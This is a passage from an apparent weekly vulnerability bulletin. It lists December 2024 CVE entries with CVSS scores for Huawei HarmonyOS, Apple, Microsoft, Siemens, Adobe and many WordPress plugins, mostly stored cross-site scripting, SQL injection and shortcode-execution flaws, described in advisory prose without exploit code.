Read/Write vulnerability in the image decoding module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54107 |
| huawei -- harmonyos |
Read/Write vulnerability in the image decoding module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54108 |
| huawei -- harmonyos |
Read/Write vulnerability in the image decoding module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54109 |
| huawei -- harmonyos |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2024-12-12 | 7.5 | CVE-2024-54110 |
| huawei -- harmonyos |
Read/Write vulnerability in the image decoding module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54111 |
| huawei -- harmonyos |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2024-12-12 | 7.5 | CVE-2024-54112 |
| huawei -- harmonyos |
Process residence vulnerability in abnormal scenarios in the print module Impact: Successful exploitation of this vulnerability may affect power consumption. | 2024-12-12 | 7.5 | CVE-2024-54113 |
| huawei -- harmonyos |
Out-of-bounds access vulnerability in playback in the DASH module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54114 |
| huawei -- harmonyos |
Out-of-bounds read vulnerability in the DASH module Impact: Successful exploitation of this vulnerability will affect availability. | 2024-12-12 | 7.5 | CVE-2024-54115 |
| huawei -- harmonyos |
Out-of-bounds read vulnerability in the M3U8 module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally. | 2024-12-12 | 7.5 | CVE-2024-54116 |
| huawei -- harmonyos |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2024-12-12 | 7.5 | CVE-2024-54117 |
| apple -- watchos |
The issue was addressed with improved checks. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, Safari 18.2, iOS 18.2 and iPadOS 18.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2024-12-12 | 7.5 | CVE-2024-54479 |
| apple -- watchos |
The issue was addressed with improved memory handling. This issue is fixed in watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, Safari 18.2, iOS 18.2 and iPadOS 18.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2024-12-12 | 7.5 | CVE-2024-54508 |
| n/a -- n/a |
A flaw was found in Quarkus-HTTP, which incorrectly parses cookies with certain value-delimiting characters in incoming requests. This issue could allow an attacker to construct a cookie value to exfiltrate HttpOnly cookie values or spoof arbitrary additional cookie values, leading to unauthorized data access or modification. The main threat from this flaw impacts data confidentiality and integrity. | 2024-12-12 | 7.4 | CVE-2024-12397 |
| n/a -- n/a |
Microsoft SharePoint Remote Code Execution Vulnerability | 2024-12-12 | 7.4 | CVE-2024-49070 |
| n/a -- n/a |
The The Grid Plus - Unlimited grid layout plugin for WordPress is vulnerable to arbitrary shortcode execution via grid_plus_load_by_category AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-12 | 7.3 | CVE-2024-10910 |
| n/a -- n/a |
System Center Operations Manager Elevation of Privilege Vulnerability | 2024-12-12 | 7.3 | CVE-2024-43594 |
| n/a -- n/a |
WmsRepair Service Elevation of Privilege Vulnerability | 2024-12-12 | 7.3 | CVE-2024-49107 |
| n/a -- n/a |
A vulnerability has been identified in SIMATIC S7-PLCSIM V17 (All versions), SIMATIC S7-PLCSIM V18 (All versions), SIMATIC STEP 7 Safety V17 (All versions), SIMATIC STEP 7 Safety V18 (All versions), SIMATIC STEP 7 Safety V19 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions), SIMATIC STEP 7 V19 (All versions), SIMATIC WinCC Unified PC Runtime V18 (All versions), SIMATIC WinCC Unified PC Runtime V19 (All versions), SIMATIC WinCC Unified V17 (All versions), SIMATIC WinCC Unified V18 (All versions), SIMATIC WinCC Unified V19 (All versions), SIMATIC WinCC V17 (All versions), SIMATIC WinCC V18 (All versions), SIMATIC WinCC V19 (All versions), SIMOCODE ES V17 (All versions), SIMOCODE ES V18 (All versions), SIMOCODE ES V19 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SIMOTION SCOUT TIA V5.6 SP1 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SINAMICS Startdrive V19 (All versions), SIRIUS Safety ES V17 (TIA Portal) (All versions), SIRIUS Safety ES V18 (TIA Portal) (All versions), SIRIUS Safety ES V19 (TIA Portal) (All versions), SIRIUS Soft Starter ES V17 (TIA Portal) (All versions), SIRIUS Soft Starter ES V18 (TIA Portal) (All versions), SIRIUS Soft Starter ES V19 (TIA Portal) (All versions), TIA Portal Cloud V17 (All versions), TIA Portal Cloud V18 (All versions), TIA Portal Cloud V19 (All versions). The affected devices do not properly sanitize user-controllable input when parsing user settings. This could allow an attacker to locally execute arbitrary commands in the host operating system with the privileges of the user. | 2024-12-10 | 7.3 | CVE-2024-52051 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a compromised form. | 2024-12-10 | 7.3 | CVE-2024-54037 |
| n/a -- n/a |
The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form's subject parameter in all versions up to, and including, 5.2.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 7.2 | CVE-2024-10646 |
| n/a -- n/a |
The Ninja Forms - The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the calculations parameter in all versions up to, and including, 3.8.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 7.2 | CVE-2024-11052 |
| n/a -- n/a |
The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via submission forms in all versions up to, and including, 3.24.5 due to insufficient input sanitization and output escaping on the new Taxonomy form. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when lower-level users have been granted access to submit specific forms, which is disabled by default. | 2024-12-14 | 7.2 | CVE-2024-11720 |
| n/a -- n/a |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | 2024-12-12 | 7.2 | CVE-2024-49089 |
| n/a -- n/a |
Windows Domain Name Service Remote Code Execution Vulnerability | 2024-12-12 | 7.2 | CVE-2024-49091 |
| lopalopa -- e-learning_management_system |
A SQL Injection was found in /admin/edit_user.php of kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL commands to get unauthorized database access via the firstname, lastname, and username parameters. | 2024-12-09 | 7.2 | CVE-2024-54922 |
| lopalopa -- e-learning_management_system |
KASHIPARA E-learning Management System v1.0 is vulnerable to SQL Injection in /admin/delete_subject.php. | 2024-12-09 | 7.2 | CVE-2024-54929 |
| lopalopa -- e-learning_management_system |
Kashipara E-learning Management System v1.0 is vulnerable to SQL Injection in /admin/delete_student.php. | 2024-12-09 | 7.2 | CVE-2024-54930 |
| lopalopa -- e-learning_management_system |
Kashipara E-learning Management System v1.0 is vulnerable to SQL Injection in /admin/delete_content.php. | 2024-12-09 | 7.2 | CVE-2024-54933 |
| n/a -- n/a |
The Crafthemes Demo Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'process_uploaded_files' function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-12-14 | 7.2 | CVE-2024-9698 |
| n/a -- n/a |
The RapidLoad - Optimize Web Vitals Automatically plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the uucss_data, update_rapidload_settings, wp_ajax_update_htaccess_file, uucss_update_rule, upload_rules, get_all_rules, update_titan_settings, preload_page, and activate_module functions in all versions up to, and including, 2.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings or conduct SQL injection attacks. | 2024-12-11 | 7.1 | CVE-2024-11840 |
| apple -- macos |
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to overwrite arbitrary files. | 2024-12-12 | 7.1 | CVE-2024-54528 |
| n/a -- n/a |
Microsoft Office Elevation of Privilege Vulnerability | 2024-12-12 | 7 | CVE-2024-49059 |
| n/a -- n/a |
Windows Kernel Elevation of Privilege Vulnerability | 2024-12-12 | 7 | CVE-2024-49084 |
| n/a -- n/a |
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability | 2024-12-12 | 7 | CVE-2024-49095 |
| n/a -- n/a |
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability | 2024-12-12 | 7 | CVE-2024-49097 |
| n/a -- n/a |
Acrobat Reader versions 24.005.20307, 24.001.30213, 24.001.30193, 20.005.30730, 20.005.30710 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-10 | 7 | CVE-2024-49530 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| n/a -- n/a |
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability | 2024-12-12 | 6.8 | CVE-2024-49073 |
| n/a -- n/a |
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability | 2024-12-12 | 6.8 | CVE-2024-49077 |
| n/a -- n/a |
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability | 2024-12-12 | 6.8 | CVE-2024-49078 |
| n/a -- n/a |
Windows File Explorer Information Disclosure Vulnerability | 2024-12-12 | 6.8 | CVE-2024-49082 |
| n/a -- n/a |
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability | 2024-12-12 | 6.8 | CVE-2024-49083 |
| n/a -- n/a |
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability | 2024-12-12 | 6.8 | CVE-2024-49092 |
| n/a -- n/a |
Windows Mobile Broadband Driver Elevation of Privilege Vulnerability | 2024-12-12 | 6.8 | CVE-2024-49110 |
| n/a -- n/a |
Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability | 2024-12-12 | 6.6 | CVE-2024-49081 |
| n/a -- n/a |
Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability | 2024-12-12 | 6.6 | CVE-2024-49094 |
| n/a -- n/a |
Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability | 2024-12-12 | 6.6 | CVE-2024-49101 |
| n/a -- n/a |
Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability | 2024-12-12 | 6.6 | CVE-2024-49109 |
| n/a -- n/a |
Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability | 2024-12-12 | 6.6 | CVE-2024-49111 |
| n/a -- n/a |
The Responsive Filterable Portfolio plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-13 | 6.5 | CVE-2019-25221 |
| n/a -- n/a |
The SQL Chart Builder plugin for WordPress is vulnerable to SQL Injection via the 'arg1' arg of the 'gvn_schart_2' shortcode in all versions up to, and including, 2.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-12 | 6.5 | CVE-2024-11430 |
| n/a -- n/a |
The Woodmart theme for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.0.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode through the woodmart_instagram_ajax_query AJAX action. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-12 | 6.5 | CVE-2024-12333 |
| n/a -- n/a |
The Library Management System - Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the 'owt7_borrow_books_id' parameter in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-12 | 6.5 | CVE-2024-12406 |
| n/a -- n/a |
The The Simple Link Directory plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.4.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-13 | 6.5 | CVE-2024-12417 |
| n/a -- n/a |
The The WPMobile.App - Android and iOS Mobile Application plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 11.52. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-13 | 6.5 | CVE-2024-12420 |
| n/a -- n/a |
The The Coupon Affiliates - Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.16.7.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. The Cross-Site Scripting was patched in version 5.16.7.1, while the arbitrary shortcode execution was patched in 5.16.7.2. | 2024-12-13 | 6.5 | CVE-2024-12421 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction. | 2024-12-10 | 6.5 | CVE-2024-43729 |
| apple -- macos |
This issue was addressed through improved state management. This issue is fixed in macOS Ventura 13.7.2, macOS Sonoma 14.7.2. A user with screen sharing access may be able to view another user's screen. | 2024-12-12 | 6.5 | CVE-2024-44248 |
| n/a -- n/a |
Microsoft SharePoint Information Disclosure Vulnerability | 2024-12-12 | 6.5 | CVE-2024-49062 |
| n/a -- n/a |
Microsoft SharePoint Information Disclosure Vulnerability | 2024-12-12 | 6.5 | CVE-2024-49064 |
| n/a -- n/a |
Improper authorization of an index that contains sensitive information from a Global Files search in Windows Defender allows an authorized attacker to disclose information over a network. | 2024-12-12 | 6.5 | CVE-2024-49071 |
| n/a -- n/a |
IBM InfoSphere Information Server 11.7 could allow an authenticated user to GUI to not load or stop working due to improper input validation. | 2024-12-12 | 6.5 | CVE-2024-52901 |
| apple -- watchos |
The issue was addressed with improved checks. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. Processing a maliciously crafted font may result in the disclosure of process memory. | 2024-12-12 | 6.5 | CVE-2024-54486 |
| n/a -- n/a |
The Cognito Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-10182 |
| n/a -- n/a |
The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Tile Gallery' widget in all versions up to, and including, 1.5.126 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-10784 |
| n/a -- n/a |
The Visualmodo Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-12-14 | 6.4 | CVE-2024-11095 |
| n/a -- n/a |
The Arena.IM - Live Blogging for real-time events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'arenablog' shortcode in all versions up to, and including, 0.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11384 |
| n/a -- n/a |
The Top and footer bars for announcements, notifications, advertisements, promotions - YooBar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Yoo Bar settings in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11410 |
| n/a -- n/a |
The HostFact bestelformulier integratie plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bestelformulier' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11413 |
| n/a -- n/a |
The Catch Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catch-popup' shortcode in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11427 |
| n/a -- n/a |
The Surbma | SalesAutopilot Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sa-form' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11433 |
| n/a -- n/a |
The Horizontal scroll image slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'horizontal-scroll-image-slideshow' shortcode in all versions up to, and including, 10.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11442 |
| n/a -- n/a |
The ONLYOFFICE DocSpace plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice-docspace' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11750 |
| n/a -- n/a |
The TCBD Popover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd-popover-image ' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11751 |
| n/a -- n/a |
The Eveeno plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'eveeno' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11752 |
| n/a -- n/a |
The Booking System Trafft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'trafftbooking' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-13 | 6.4 | CVE-2024-11754 |
| n/a -- n/a |
The IMS Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown post settings in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11755 |
| n/a -- n/a |
The WP GeoNames plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-geonames' shortcode in all versions up to, and including, 1.9.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11757 |
| n/a -- n/a |
The Bukza plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bukza' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11759 |
| n/a -- n/a |
The Currency Converter Widget ? PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'currency-converter-widget-pro' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11760 |
| n/a -- n/a |
The Plezi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'plezi' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11763 |
| n/a -- n/a |
The WordPress Portfolio Plugin - A Plugin for Making Filterable Portfolio Grid, Portfolio Slider and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_portfolio' shortcode in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11765 |
| n/a -- n/a |
The WordPress Book Plugin for Displaying Books in Grid, Flip, Slider, Popup Layout and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_book_showcase' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11766 |
| n/a -- n/a |
The NewsmanApp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'newsman_subscribe_widget' shortcode in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-13 | 6.4 | CVE-2024-11767 |
| n/a -- n/a |
The Post Carousel & Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'post-cs' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11770 |
| n/a -- n/a |
The Smart Agenda - Prise de rendez-vous en ligne plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'smartagenda' shortcode in all versions up to, and including, 4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11781 |
| n/a -- n/a |
The Integrate Firebase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'firebase_show' shortcode in all versions up to, and including, 0.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11785 |
| n/a -- n/a |
The Out of the Block: OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ootb_query shortcode in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-13 | 6.4 | CVE-2024-11827 |
| n/a -- n/a |
The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JavaScript row settings in all versions up to, and including, 2.8.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-13 | 6.4 | CVE-2024-11832 |
| n/a -- n/a |
The Koalendar - Events & Appointments Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'height' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11855 |
| n/a -- n/a |
The Tabs Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on tab descriptions. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11865 |
| n/a -- n/a |
The Companion Portfolio - Responsive Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'companion-portfolio' shortcode in all versions up to, and including, 2.4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11867 |
| n/a -- n/a |
The Buk for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buk' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11869 |
| n/a -- n/a |
The Social Media Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'patreon' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11871 |
| n/a -- n/a |
The glomex oEmbed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glomex_integration' shortcode in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11873 |
| n/a -- n/a |
The Add infos to the events calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fuss' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 6.4 | CVE-2024-11875 |
| n/a -- n/a |
The Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kredeum_opensky' shortcode in all versions up to, and including, 1.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11876 |
| n/a -- n/a |
The Cricket Live Score plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cricket_score' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11877 |
| n/a -- n/a |
The Stripe Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stripe_donation' shortcode in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-14 | 6.4 | CVE-2024-11879 |
| n/a -- n/a |
